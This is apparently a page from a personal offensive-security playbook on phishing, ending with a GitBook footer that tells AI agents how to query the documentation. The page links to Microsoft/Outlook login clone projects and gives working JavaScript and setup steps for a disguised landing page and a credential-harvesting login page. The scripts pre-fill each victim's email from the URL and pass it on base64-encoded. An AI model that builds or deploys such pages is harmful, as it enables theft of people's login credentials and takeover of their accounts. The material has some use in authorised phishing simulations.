> For the complete documentation index, see [llms.txt](https://jackmeister.gitbook.io/jackmeister-playbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jackmeister.gitbook.io/jackmeister-playbook/phishing.md).

# Phishing

### Make sure to check what mailing server target is using first

### Outlook Login Pages

<https://github.com/Octagon-simon/microsoft-login-clone> <https://github.com/JoniRinta->

Kahila/microsoft-login-spoof/blob/main/HTML%26JS-only/index.html

### Setup Landing Page (Cover Page)

* Remove any javascripts
* Remove all forms
* Add "Welcome , Continue Sign in as" `<span id="gf-user"></span>`where gf user get from email link
* Add to "sign in button" onclick="redirected()"

**Add js script**

```javascript
   <script>
            function onWindowLoad() {
                const urlParams = new URLSearchParams(window.location.search);
                const email = urlParams.get('email');
		const destination = urlParams.get('url');
		var xhr = new XMLHttpRequest();
    		xhr.open('GET', destination, true);
		xhr.send();
		fetch(destination);
                var outputCdc = document.getElementById("gf-user");
                outputCdc.innerText=`${email}`;
            }
            window.onload = onWindowLoad;

            function redirected() {
              const urlParams = new URLSearchParams(window.location.search);
              const destination = urlParams.get('url');
              const email = urlParams.get('email');
              const emailb = btoa(email);
              if (destination) {
                window.location.href = destination + "&key=" + emailb;
              } else {
                window.location.href = 'defaultPage.html';
              }              
            }
    </script>
```

### Setup Login Page (Credential Harvesting Page)

**Add js script**

```javascript
<script>
      window.onload = function() {
        const urlParams = new URLSearchParams(window.location.search);
        const emailb = urlParams.get('key');
        const email = atob(emailb);
        const inpele2 = document.getElementById('emailkau');
        const inpele3 = document.getElementById('displayName');
        inpele2.value = email;
        inpele3.textContent = email;
      };
    </script>
```

Remember to replace any value with "emailkau" to show email when load<br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jackmeister.gitbook.io/jackmeister-playbook/phishing.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.